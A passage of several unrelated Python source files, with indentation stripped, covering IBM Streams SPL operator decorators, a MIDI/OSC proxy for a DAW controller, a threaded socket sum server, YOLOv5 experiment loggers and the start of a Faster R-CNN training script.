def __str__(self):
s = ''
if self.style is not None:
s += 'style=' + str(self.style)
if not self.docpy:
if s:
s += ', '
s += 'docpy=False'
return '@spl.filter(' + s + ')'
def ignore(wrapped):
"""
Decorator to ignore a Python function.
If a Python callable is decorated with ``@spl.ignore``
then function is ignored by ``spl-python-extract.py``.
Args:
wrapped: Function that will be ignored.
"""
@functools.wraps(wrapped)
def _ignore(*args, **kwargs):
return wrapped(*args, **kwargs)
_ignore._splpy_optype = _OperatorType.Ignore
_ignore._splpy_file = inspect.getsourcefile(wrapped)
return _ignore
# Defines a function as a sink operator
class for_each(object):
"""
Creates an SPL operator with a single input port.
A SPL operator with a single input port and no output ports.
For each tuple on the input port the decorated callable
is called passing the contents of the tuple.
Example definition::
@spl.for_each()
def PrintTuple(*tuple_):
\"\"\"Print each tuple to standard out.\"\"\"
print(tuple_, flush=True)
Example SPL invocation::
() as PT = PrintTuple(SensorReadings) { }
Example definition with handling window punctuations::
@spl.for_each(style='position')
class PrintPunct(object):
def __init__(self):
pass
def __call__(self, value):
assert value > 0
def on_punct(self):
print('window marker received')
.. note::
Punctuation marks are in-band signals that are inserted between tuples in a stream. Window punctuations are inserted into a stream that are related to the semantics of the operator. One example is the :py:meth:`~Window.aggregate`, which inserts a window marker into the output stream after each aggregation.
Args:
style: How the SPL tuple is passed into Python callable, see :ref:`spl-tuple-to-python`.
docpy: Copy Python docstrings into SPL operator model for SPLDOC.
Exceptions raised by ``__call__`` can be suppressed when this decorator
wraps a class with context manager ``__enter__`` and ``__exit__`` methods.
If ``__exit__`` returns a true value when called with the exception
then the expression is suppressed and the tuple that caused the
exception is ignored.
Supports handling window punctuation markers in the Sink operator in ``on_punct`` method (new in version 1.16).
"""
def __init__(self, style=None, docpy=True):
self.style = style
self.docpy = docpy
def __call__(self, wrapped):
decorated = _wrapforsplop(_OperatorType.Sink, wrapped, self.style, self.docpy)
if inspect.isclass(decorated):
decorated._splpy_decor = str(self)
return decorated
def __str__(self):
s = ''
if self.style is not None:
s += 'style=' + str(self.style)
if not self.docpy:
if s:
s += ', '
s += 'docpy=False'
return '@spl.for_each(' + s + ')'
class PrimitiveOperator(object):
"""Primitive operator super class.
Classes decorated with `@spl.primitive_operator` must extend
this class if they have one or more output ports. This class
provides the `submit` method to submit tuples to specified
otuput port.
.. versionadded:: 1.8
"""
def submit(self, port_id, tuple_):
"""Submit a tuple to the output port.
The value to be submitted (``tuple_``) can be a ``None`` (nothing will be submitted),
``tuple``, ``dict` or ``list`` of those types. For details
on how the ``tuple_`` is mapped to an SPL tuple see :ref:`submit-from-python`.
Args:
port_id: Identifier of the port specified in the
``output_ports`` parameter of the ``@spl.primitive_operator``
decorator.
tuple_: Tuple (or tuples) to be submitted to the output port.
"""
port_index = self._splpy_output_ports[port_id]
ec._submit(self, port_index, tuple_)
def submit_punct(self, port_id):
"""Submit a window punctuation marker to the output port.
.. note::
Punctuation marks are in-band signals that are inserted between tuples in a stream. Window punctuations are inserted into a stream that are related to the semantics of the operator. One example is the :py:meth:`~Window.aggregate`, which inserts a window marker into the output stream after each aggregation.
Args:
port_id: Identifier of the port specified in the
``output_ports`` parameter of the ``@spl.primitive_operator``
decorator.
.. versionadded:: 1.16
"""
port_index = self._splpy_output_ports[port_id]
ec._submit_punct(self, port_index)
def all_ports_ready(self):
"""Notifcation that the operator can submit tuples.
Called when the primitive operator can submit tuples
using :py:meth:`submit`. An operator must not submit
tuples until this method is called or until a port
processing method is called.
Any implementation must not block. A typical use
is to start threads that submit tuples.
An implementation must return a value that allows
the SPL runtime to determine when an operator completes.
An operator completes, and finalizes its output ports
when:
* All input ports (if any) have been finalized.
* All background processing is complete.
The return from ``all_ports_ready`` defines when
background processing, such as threads started by
``all_ports_ready``, is complete. The value is one of:
* A value that evaluates to `False` - No background processing exists.
* A value that evaluates to `True` - Background processing exists and never completes. E.g. a source operator that processes real time events.
* A callable - Background processing is complete when the callable returns. The SPL runtime invokes the callable once (passing no arguments) when the method returns background processing is assumed to be complete.
For example if an implementation starts a single thread then `Thread.join` is returned to complete the operator when the thread completes::
def all_ports_ready(self):
submitter = threading.Thread(target=self._find_and_submit_data)
submitter.start()
return submitter.join
def _find_and_submit_data(self):
...
Returns:
Value indicating active background processing.
This method implementation does nothing and returns ``None``.
"""
return None
class input_port(object):
"""Declare an input port and its processor method.
Instance methods within a class decorated by
:py:class:`spl.primitive_operator <primitive_operator>` declare
input ports by decorating methods with this decorator.
Each tuple arriving on the input port will result in a call
to the processor method passing the stream tuple converted to
a Python representation depending on the style. The style is
determined by the method signature or the `style` parameter,
see :ref:`spl-tuple-to-python`.
The order of the methods within the class define
the order of the ports, so the first port is
the first method decorated with `input_port`.
Args:
style: How the SPL tuple is passed into the method, see :ref:`spl-tuple-to-python`.
.. versionadded:: 1.8
"""
_count = 0
def __init__(self, style=None):
self._style = style
def __call__(self, wrapped):
wrapped._splpy_input_port_seq = input_port._count
wrapped._splpy_input_port_config = self
wrapped._splpy_style = self._style
input_port._count += 1
return wrapped
class primitive_operator(object):
"""Creates an SPL primitive operator with an arbitrary number of input ports and
output ports.
Input ports are declared by decorating an instance method
with :py:meth:`input_port`. The method is the process method
for the input port and is called for each tuple that arrives
at the port. The order of the decorated process methods defines
the order of the ports in the SPL operator, with the first
process method being the first port at index zero.
Output ports are declared by the ``output_ports`` parameter which
is set to a ``list`` of port identifiers. The port identifiers are
arbitrary but must be hashable. Port identifiers allow the ability
to submit tuples "logically' rather than through a port index. Typically
a port identifier will be a `str` or an `enum`. The size of the list
defines the number of output ports with the first identifier in the list
coresponding to the first output port of the operator at index zero.
If the list is empty or not set then the operator has no output ports.
Tuples are submitted to an output port using :py:meth:`~PrimitiveOperator.submit`.
When an operator has output ports it must be a sub-class of
:py:class:`PrimitiveOperator` which provides the
:py:meth:`~PrimitiveOperator.submit` method and the ports
ready notification mechanism :py:meth:`~PrimitiveOperator.all_ports_ready`.
Example definition of an operator with a single input port and two output ports::
@spl.primitive_operator(output_ports=['MATCH', 'NEAR_MATCH'])
class SelectCustomers(spl.PrimitiveOperator):
\"\"\" Score customers using a model.
Customers that are a good match are submitted to port 0 ('MATCH')
while customers that are a near match are submitted to port 1 ('NEAR_MATCH').
Customers that are not a good or near match are not submitted to any port.
\"\"\"
def __init__(self, match, near_match):
self.match = match
self.near_match = near_match
@spl.input_port()
def customers(self, **tuple_):
customer_score = self.score(tuple_)
if customer_score >= self.match:
self.submit('MATCH', tuple_)
elif customer_score >= self.near_match:
self.submit('NEAR_MATCH', tuple_)
def score(self, **customer):
# Actual model scoring omitted
score = ...
return score
Example SPL invocation::
(stream<Customers> MakeOffer; stream<Customers> ImproveOffer>) = SelectCustomers(Customers) {
param
match: 0.9;
near_match: 0.8;
}
Example definition of an operator with punctuation handling::
@spl.primitive_operator(output_ports=['A'])
class SimpleForwarder(spl.PrimitiveOperator):
def __init__(self):
pass
@spl.input_port()
def port0(self, *t):
self.submit('A', t)
def on_punct(self):
self.submit_punct('A')
Supports handling window punctuation markers in the primitive operator in ``on_punct`` method (new in version 1.16).
.. note::
Punctuation marks are in-band signals that are inserted between tuples in a stream. Window punctuations are inserted into a stream that are related to the semantics of the operator. One example is the :py:meth:`~Window.aggregate`, which inserts a window marker into the output stream after each aggregation.
Args:
output_ports(list): List of identifiers for output ports.
docpy: Copy Python docstrings into SPL operator model for SPLDOC.
.. versionadded:: 1.8
"""
def __init__(self, output_ports=None,docpy=True):
self._docpy = docpy
self._output_ports = output_ports
def __call__(self, wrapped):
if not inspect.isclass(wrapped):
raise TypeError('A class is required:' + str(wrapped))
_valid_identifier(wrapped.__name__)
cls = _wrapforsplop(_OperatorType.Primitive, wrapped, None, self._docpy)
inputs = dict()
for fname, fn in inspect.getmembers(wrapped):
if hasattr(fn, '_splpy_input_port_seq'):
inputs[fn._splpy_input_port_seq] = fn
cls._splpy_input_ports = []
cls._splpy_style = []
cls._splpy_fixed_count = []
for seq in sorted(inputs.keys()):
fn = inputs[seq]
fn._splpy_input_port_id = len(cls._splpy_input_ports)
fn._splpy_style = _define_style(wrapped, fn, fn._splpy_style)
fn._splpy_fixed_count = _define_fixed(cls, fn)
cls._splpy_input_ports.append(fn)
cls._splpy_style.append(fn._splpy_style)
cls._splpy_fixed_count.append(fn._splpy_fixed_count)
cls._splpy_output_ports = dict()
if self._output_ports:
for i in range(len(self._output_ports)):
cls._splpy_output_ports[self._output_ports[i]] = i
cls._splpy_decor = str(self)
return cls
def __str__(self):
s = ''
if self._output_ports:
s += 'output_ports=' + str(self._output_ports)
if not self._docpy:
if s:
s += ', '
s += 'docpy=False'
return '@spl.primitive(' + s + ')'
|
oscproxy.py | import logging
import time
import threading
import os
from queue import Queue, Empty
import rtmidi
from rtmidi.midiconstants import CONTROL_CHANGE
import yaml
from bidict import bidict
from pythonosc import osc_server, udp_client
from pythonosc.dispatcher import Dispatcher
from pythonosc.osc_message_builder import OscMessageBuilder
from pythonosc.osc_bundle_builder import OscBundleBuilder, IMMEDIATELY
logger = logging.getLogger(__name__)
class OSCProxy(object):
def __init__(self, cfg):
self.fx_name = ''
self.learn_active = False
self.fx_follow = True
self.fx_visible = False
self.fx_maps_path = cfg['fx_maps_path']
self.cfg_global = cfg_global = cfg['global']
self.cfg_ctl_midi = cfg_ctl_midi = cfg['controller_midi']
self.cfg_ctl_osc = cfg_ctl_osc = cfg['controller_osc']
self.cfg_daw_osc = cfg_daw_osc = cfg['daw_osc']
midi_cc_param_map = {
(cfg_ctl_midi['cc_param_start'] + i): (i + 1)
for i in range(cfg_global['params'])
}
self.num_params = cfg_global['params']
self.cc_param_start = self.cfg_ctl_midi['cc_param_start']
self.cc_param_end = self.cc_param_start + self.num_params
self.midi_cc_param_map = bidict(midi_cc_param_map)
self.fx_maps = self.load_fx_maps()
self.source_target_map = bidict()
self.learn_active = False
self.learn_source = None
self.learn_target = None
self.bypass_fx = False
logger.info('Initializing controller osc client to {}:{}'.format(
cfg_ctl_osc['remote_ip'], cfg_ctl_osc['remote_port']
))
self.ctl_osc_client = udp_client.SimpleUDPClient(
cfg_ctl_osc['remote_ip'], cfg_ctl_osc['remote_port'])
logger.info('Initializing daw osc client to {}:{}'.format(
cfg_daw_osc['remote_ip'], cfg_daw_osc['remote_port']
))
self.to_daw_client = udp_client.SimpleUDPClient(
cfg_daw_osc['remote_ip'], cfg_daw_osc['remote_port'])
self.midi_in = rtmidi.MidiIn()
self.midi_out = rtmidi.MidiOut()
in_ports = self.midi_in.get_ports()
out_ports = self.midi_out.get_ports()
logger.info(
'Initializing midi'
' input port "{}" param channel {}'
' cmd channel {} output port "{}"'.format(
cfg_ctl_midi['input_port'],
cfg_ctl_midi['param_channel'],
cfg_ctl_midi['cmd_channel'],
cfg_ctl_midi['output_port']
))
logger.info('Available input ports: %s', in_ports)
try:
self.midi_in_port = in_ports.index(cfg_ctl_midi['input_port'])
except ValueError:
self.midi_in_port = None
self.midi_channel_param = cfg_ctl_midi['param_channel']
self.midi_channel_cmd = cfg_ctl_midi['cmd_channel']
logger.info('Available output ports: %s', out_ports)
try:
self.midi_out_port = out_ports.index(cfg_ctl_midi['output_port'])
except ValueError:
self.midi_out_port = None
self.midi_in.set_callback(self.handle_midi_from_ctl)
self.daw_osc_dispatcher = Dispatcher()
self.daw_osc_dispatcher.map('/*', self.handle_osc_from_daw)
self.ctl_osc_dispatcher = Dispatcher()
self.ctl_osc_dispatcher.map('/*', self.handle_osc_from_ctl)
logger.info('Initializing daw osc server on {}:{}'.format(
cfg_daw_osc['listen_ip'], cfg_daw_osc['listen_port']
))
self.daw_osc_server = osc_server.BlockingOSCUDPServer(
(cfg_daw_osc['listen_ip'], cfg_daw_osc['listen_port']),
self.daw_osc_dispatcher)
self.daw_osc_thread = threading.Thread(
target=self.daw_osc_server.serve_forever)
logger.info('Initializing controller osc server on {}:{}'.format(
cfg_ctl_osc['listen_ip'], cfg_ctl_osc['listen_port']
))
self.ctl_osc_server = osc_server.BlockingOSCUDPServer(
(cfg_ctl_osc['listen_ip'], cfg_ctl_osc['listen_port']),
self.ctl_osc_dispatcher)
self.ctl_osc_thread = threading.Thread(
target=self.ctl_osc_server.serve_forever)
self.send_osc_to_internal_queue = Queue()
self.send_osc_to_ctl_queue = Queue()
self.send_osc_to_ctl_thread = threading.Thread(
target=self.consume_ctl_osc_queue)
self.send_interval = 0.01
self.send_midi_to_ctl_queue = Queue()
self.send_midi_to_ctl_thread = threading.Thread(
target=self.consume_send_midi_to_ctl_queue)
def load_fx_maps(self):
if not os.path.exists(self.fx_maps_path):
return {}
with open(self.fx_maps_path) as f:
data = yaml.safe_load(f)
if data is None:
data = {}
logger.info('Loaded maps for fx: {}'.format(','.join(data)))
return {
fx_name: bidict(fx_map) for fx_name, fx_map in data.items()
}
def save_fx_maps(self):
with open(self.fx_maps_path, 'w') as f:
data = {
fx_name: dict(fx_map) for fx_name, fx_map in self.fx_maps.items()
}
yaml.dump(data, f)
def refresh_fx(self):
return
self.send_osc_to_daw("/fx/select/prev", 1)
self.send_osc_to_daw("/fx/select/next", 1)
def clear(self):
self.source_target_map.clear()
self.save_fx_maps()
self.init_osc_device_params()
self.init_midi_device_params()
self.refresh_fx()
def consume_ctl_osc_queue(self):
bundle_builder = OscBundleBuilder(IMMEDIATELY)
last_send_time = 0
while True:
try:
item = self.send_osc_to_ctl_queue.get_nowait()
except Empty:
time.sleep(0.005)
else:
address, values = item
msg_builder = OscMessageBuilder(address=address)
for value in values:
msg_builder.add_arg(value)
msg = msg_builder.build()
bundle_builder.add_content(msg)
if not bundle_builder._contents:
continue
curr_time = time.time()
if curr_time - last_send_time > self.send_interval:
bundle = bundle_builder.build()
self.ctl_osc_client.send(bundle)
bundle_builder = OscBundleBuilder(IMMEDIATELY)
last_send_time = curr_time
def consume_send_midi_to_ctl_queue(self):
while True:
msg = self.send_midi_to_ctl_queue.get()
print('midi send', msg)
self.midi_out.send_message(msg)
def init_osc_device_params(self):
for param_num in range(1, 17):
self.send_osc_to_ctl(
f"/fx/param/{param_num}/str", '')
self.send_osc_to_ctl(
f"/fx/param/{param_num}/name", '')
self.send_osc_to_ctl(
f"/fx/param/{param_num}/val", 0)
def init_osc_device(self):
self.send_osc_to_ctl(
f"/fx/learn", 0)
self.send_osc_to_ctl(
"/fx/name", '')
self.init_osc_device_params()
def init_midi_device_params(self):
for cc in self.midi_cc_param_map.keys():
self.send_midi_to_ctl(cc, 0)
def init_midi_device(self):
self.init_midi_device_params()
def handle_osc_from_daw(self, addr, *args):
print('got', addr, args)
if addr == '/fx/name':
fx_name = args[0]
logger.info('Set FX: %s', fx_name)
self.set_fx(fx_name)
self.send_osc_to_ctl(
"/fx/name", fx_name)
self.init_osc_device_params()
self.init_midi_device_params()
elif addr.startswith('/fx/param/'):
fields = addr.split('/')
target_param = int(fields[-2])
param_attr = fields[-1]
if param_attr == 'val' and self.learn_active:
self.set_learn_target(target_param)
try:
source_param = self.source_target_map.inverse[target_param]
except KeyError:
return
prefix = f"/fx/param/{source_param}"
if param_attr == 'name':
name = args[0]
print('got fx param', name)
self.send_osc_to_ctl(
f"{prefix}/name", name)
if param_attr == 'val':
val = float(args[0])
self.send_osc_to_ctl(
f"{prefix}/val", val)
cc = self.midi_cc_param_map.inverse[source_param]
midi_val = int(val * 127)
self.send_midi_to_ctl(cc, midi_val)
elif param_attr == 'str':
s = args[0]
self.send_osc_to_ctl(
f"{prefix}/str", s)
elif addr == '/fx/bypass':
print('bypass', bool(args[0]))
self.bypass_fx = bool(args[0])
elif addr == '/fx/openui':
self.fx_visible = bool(args[0])
def handle_osc_from_ctl(self, addr, *args):
if addr.startswith('/fx/param/'):
fields = addr.split('/')
source_param = int(fields[-2])
param_attr = fields[-1]
if param_attr == 'val' and self.learn_active:
self.set_learn_source(source_param)
try:
target_param = self.source_target_map[source_param]
except KeyError:
return
prefix = f"/fx/param/{target_param}"
if param_attr == 'val':
self.send_osc_to_daw(
f"{prefix}/val", args[0])
elif addr == '/fx/learn':
self.toggle_learn()
elif addr == '/fx/clear':
self.clear()
def toggle_fx_follow(self):
self.fx_follow = not self.fx_follow
if self.fx_follow:
logger.info('FX follow: focused')
self.send_osc_to_daw(
"/device/fx/follows/focused", 1)
else:
logger.info('FX follow: device')
self.send_osc_to_daw(
"/device/fx/follows/device", 1)
def toggle_bypass_fx(self):
self.bypass_fx = not self.bypass_fx
logger.info('Toggle bypass FX: %s', self.bypass_fx)
self.send_osc_to_daw("/fx/bypass", int(self.bypass_fx))
self.send_osc_to_ctl("/fx/bypass", int(self.bypass_fx))
def toggle_fx_ui(self):
self.fx_visible = not self.fx_visible
logger.info('Toggle FX UI: %s', self.fx_visible)
self.send_osc_to_daw("/fx/openui", int(self.fx_visible))
def toggle_helper_ui(self):
logger.info('Toggle proxy UI')
self.send_osc_to_ctl('/toggle_ui', 1)
def select_previous_fx(self):
logger.info('Selected prev FX')
self.send_osc_to_daw("/fx/select/prev", 1)
def select_next_fx(self):
logger.info('Selected next FX')
self.send_osc_to_daw("/fx/select/next", 1)
def handle_midi_from_ctl(self, event, data=None):
msg, deltatime = event
logger.info('MIDI RECV: %s', msg)
if msg[0] == (CONTROL_CHANGE | self.midi_channel_cmd):
logger.info('Handling MIDI command')
cc, value = msg[1], msg[2]
if cc == self.cfg_ctl_midi['cc_toggle_ui'] and value == 127:
self.toggle_fx_ui()
elif cc == self.cfg_ctl_midi['cc_bypass_fx'] and value == 127:
self.toggle_bypass_fx()
elif cc == self.cfg_ctl_midi['cc_prev_fx'] and value == 127:
self.select_previous_fx()
elif cc == self.cfg_ctl_midi['cc_fx_follow'] and value == 127:
self.toggle_fx_follow()
elif cc == self.cfg_ctl_midi['cc_next_fx'] and value == 127:
self.select_next_fx()
elif cc == self.cfg_ctl_midi['cc_learn'] and value == 127:
self.toggle_learn()
elif msg[0] == (CONTROL_CHANGE | self.midi_channel_param):
cc, value = msg[1], msg[2]
logger.info('Handling MIDI param CC={}'.format(cc))
if self.cc_param_start <= cc <= self.cc_param_end:
source_param = self.midi_cc_param_map[cc]
if self.learn_active:
self.set_learn_source(source_param)
return
try:
target_param = self.source_target_map[source_param]
except KeyError:
logger.info('Don\'t know how to map source param {} to target param'.format(
source_param))
return
prefix = f"/fx/param/{target_param}"
osc_val = value / 127.0
self.send_osc_to_daw(
f"{prefix}/val", osc_val)
else:
logger.info('Out of bounds <{},{}>'.format(
self.cc_param_start, self.cc_param_end))
else:
logger.info('Unknown message "{}"'.format(msg))
def set_fx(self, fx_name):
self.fx_name = fx_name
try:
source_target_map = self.fx_maps[fx_name]
except KeyError:
source_target_map = bidict()
self.fx_maps[fx_name] = source_target_map
self.source_target_map = source_target_map
def set_learn_target(self, param_num):
if self.learn_source is None:
return
self.learn_target = param_num
logger.info('Learn target set to: %d', param_num)
self.learn_check()
def set_learn_source(self, param_num):
self.learn_source = param_num
logger.info('Learn source set to: %d', param_num)
self.learn_check()
def learn_check(self):
if self.learn_source is None or self.learn_target is None:
return
logger.info(
'Learned source: %s, target: %s',
self.learn_source,
self.learn_target)
self.source_target_map.forceput(self.learn_source, self.learn_target)
self.learn_source = None
self.learn_target = None
self.save_fx_maps()
self.init_osc_device_params()
self.init_midi_device_params()
self.refresh_fx()
def send_midi_to_ctl(self, cc, val, channel=None):
if channel is None:
channel = self.midi_channel_param
self.send_midi_to_ctl_queue.put(
[CONTROL_CHANGE | channel, cc, val])
def send_osc_to_ctl(self, address, *args):
logger.info('Sending to controller: %s %s', address, args)
msg = address, args
#self.send_osc_to_ctl_queue.put(msg)
self.send_osc_to_internal_queue.put(msg)
def send_osc_to_daw(self, address, *args):
logger.info('Sending to DAW: %s %s', address, args)
self.to_daw_client.send_message(address, *args)
def start(self):
self.daw_osc_thread.start()
self.ctl_osc_thread.start()
self.send_osc_to_ctl_thread.start()
self.send_midi_to_ctl_thread.start()
if self.midi_in_port is not None:
self.midi_in.open_port(self.midi_in_port)
if self.midi_out_port is not None:
self.midi_out.open_port(self.midi_out_port)
self.init_osc_device()
self.init_midi_device()
self.refresh_fx()
def toggle_learn(self):
self.learn_active = not self.learn_active
if self.learn_active:
logger.info('Learn activated')
else:
self.save_fx_maps()
logger.info('Learn disactivated')
self.learn_source = None
self.learn_target = None
self.send_osc_to_ctl(
f"/fx/learn", 1 if self.learn_active else 0)
self.refresh_fx()
|
server.py | import socket
import threading
HOST = "127.0.0.1"
PORT = 5052
ENCODING = "ascii"
clients = []
numbers = []
# This lock is used to access 'numbers' list.
numbers_lock = threading.Lock()
# This semaphore is used for clients. So after a client put one number in 'numbers', it waits until the other number is
# also added to the array and their sum calculated. When the sum is calculated we will release this semaphore two times
# to let two client handlers work again.
client_sema = threading.Semaphore(0)
# This semaphore is used in handle_sum. It will cause it to wait until one of clients check that there are two numbers
# in 'numbers'. When there are two numbers in list, they will wake the thread that is handling handle_sum.
result_sema = threading.Semaphore(0)
def handle_client(conn: socket.socket, addr):
print(f"[CONNECTED] {addr}")
while True:
data = conn.recv(1024).decode(ENCODING)
if not data:
break
print(f"[RECEIVED] {data}")
try:
data = int(data)
with numbers_lock: # Lock for synchronization.
numbers.append(data)
except:
conn.send("Invalid Argument".encode(ENCODING))
with numbers_lock:
if len(numbers) == 2: # release semaphore to let another thread calculate their sum.
result_sema.release()
# Wait until two numbers are put in 'numbers' and their sum is calculated. After their sum is calculated,
# and the result is broadcasted, this thread is unblocked.
client_sema.acquire(blocking=True)
clients.remove(conn)
conn.close()
def broadcast(msg: str):
for client in clients:
client.send(msg.encode(ENCODING))
def handle_sum():
while True:
# Wait until there are two numbers in 'numbers'. One of the client handlers will wake this thread.
result_sema.acquire()
result = numbers[0] + numbers[1]
numbers.clear()
broadcast(str(result))
client_sema.release()
client_sema.release()
if __name__ == '__main__':
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
sum_thread = threading.Thread(target=handle_sum)
sum_thread.start()
s.bind((HOST, PORT))
s.listen()
while True:
conn, addr = s.accept()
clients.append(conn)
t = threading.Thread(target=handle_client, args=(conn, addr))
t.start()
|
__init__.py | # YOLOv5 experiment logging utils
import warnings
from threading import Thread
import torch
from torch.utils.tensorboard import SummaryWriter
from yolov5_master.utils.general import colorstr, emojis
from yolov5_master.utils.loggers.wandb.wandb_utils import WandbLogger
from yolov5_master.utils.plots import plot_images, plot_results
from yolov5_master.utils.torch_utils import de_parallel
LOGGERS = ('csv', 'tb', 'wandb') # text-file, TensorBoard, Weights & Biases
try:
import wandb
assert hasattr(wandb, '__version__') # verify package import not local dir
except (ImportError, AssertionError):
wandb = None
class Loggers():
# YOLOv5 Loggers class
def __init__(self, save_dir=None, weights=None, opt=None, hyp=None, logger=None, include=LOGGERS):
self.save_dir = save_dir
self.weights = weights
self.opt = opt
self.hyp = hyp
self.logger = logger # for printing results to console
self.include = include
self.keys = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95', # metrics
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for k in LOGGERS:
setattr(self, k, None) # init empty logger dictionary
self.csv = True # always log to csv
# Message
if not wandb:
prefix = colorstr('Weights & Biases: ')
s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv5 🚀 runs (RECOMMENDED)"
print(emojis(s))
# TensorBoard
s = self.save_dir
if 'tb' in self.include and not self.opt.evolve:
prefix = colorstr('TensorBoard: ')
self.logger.info(f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/")
self.tb = SummaryWriter(str(s))
# W&B
if wandb and 'wandb' in self.include:
wandb_artifact_resume = isinstance(self.opt.resume, str) and self.opt.resume.startswith('wandb-artifact://')
run_id = torch.load(self.weights).get('wandb_id') if self.opt.resume and not wandb_artifact_resume else None
self.opt.hyp = self.hyp # add hyperparameters
self.wandb = WandbLogger(self.opt, run_id)
else:
self.wandb = None
def on_pretrain_routine_end(self):
# Callback runs on pre-train routine end
paths = self.save_dir.glob('*labels*.jpg') # training labels
if self.wandb:
self.wandb.log({"Labels": [wandb.Image(str(x), caption=x.name) for x in paths]})
def on_train_batch_end(self, ni, model, imgs, targets, paths, plots, sync_bn):
# Callback runs on train batch end
if plots:
if ni == 0:
if not sync_bn: # tb.add_graph() --sync known issue https://github.com/ultralytics/yolov5/issues/3754
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
self.tb.add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
if ni < 3:
f = self.save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if self.wandb and ni == 10:
files = sorted(self.save_dir.glob('train*.jpg'))
self.wandb.log({'Mosaics': [wandb.Image(str(f), caption=f.name) for f in files if f.exists()]})
def on_train_epoch_end(self, epoch):
# Callback runs on train epoch end
if self.wandb:
self.wandb.current_epoch = epoch + 1
def on_val_image_end(self, pred, predn, path, names, im):
# Callback runs on val image end
if self.wandb:
self.wandb.val_one_image(pred, predn, path, names, im)
def on_val_end(self):
# Callback runs on val end
if self.wandb:
files = sorted(self.save_dir.glob('val*.jpg'))
self.wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in files]})
def on_fit_epoch_end(self, vals, epoch, best_fitness, fi):
# Callback runs at the end of each fit (train+val) epoch
x = {k: v for k, v in zip(self.keys, vals)} # dict
if self.csv:
file = self.save_dir / 'results.csv'
n = len(x) + 1 # number of cols
s = '' if file.exists() else (('%20s,' * n % tuple(['epoch'] + self.keys)).rstrip(',') + '\n') # add header
with open(file, 'a') as f:
f.write(s + ('%20.5g,' * n % tuple([epoch] + vals)).rstrip(',') + '\n')
if self.tb:
for k, v in x.items():
self.tb.add_scalar(k, v, epoch)
if self.wandb:
self.wandb.log(x)
self.wandb.end_epoch(best_result=best_fitness == fi)
def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
# Callback runs on model save event
if self.wandb:
if ((epoch + 1) % self.opt.save_period == 0 and not final_epoch) and self.opt.save_period != -1:
self.wandb.log_model(last.parent, self.opt, epoch, fi, best_model=best_fitness == fi)
def on_train_end(self, last, best, plots, epoch):
# Callback runs on training end
if plots:
plot_results(file=self.save_dir / 'results.csv') # save results.png
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
files = [(self.save_dir / f) for f in files if (self.save_dir / f).exists()] # filter
if self.tb:
import cv2
for f in files:
self.tb.add_image(f.stem, cv2.imread(str(f))[..., ::-1], epoch, dataformats='HWC')
if self.wandb:
self.wandb.log({"Results": [wandb.Image(str(f), caption=f.name) for f in files]})
# Calling wandb.log. TODO: Refactor this into WandbLogger.log_model
if not self.opt.evolve:
wandb.log_artifact(str(best if best.exists() else last), type='model',
name='run_' + self.wandb.wandb_run.id + '_model',
aliases=['latest', 'best', 'stripped'])
self.wandb.finish_run()
else:
self.wandb.finish_run()
self.wandb = WandbLogger(self.opt)
|
train_msu.py | #!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ZF")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2007_trainval', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(net_name):
# Faster R-CNN Alternating Optimization
n = 'faster_rcnn_alt_opt'
# Solver for each training stage
solvers = [[net_name, n, 'stage1_rpn_solver60k80k.pt'],
[net_name, n, 'stage1_fast_rcnn_solver30k40k.pt'],
[net_name, n, 'stage2_rpn_solver60k80k.pt'],
[net_name, n, 'stage2_fast_rcnn_solver30k40k.pt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [80000, 40000, 80000, 40000]
# max_iters = [100, 100, 100, 100]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
cfg.MODELS_DIR, net_name, n, 'rpn_test.pt')
return solvers, max_iters, rpn_test_prototxt
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
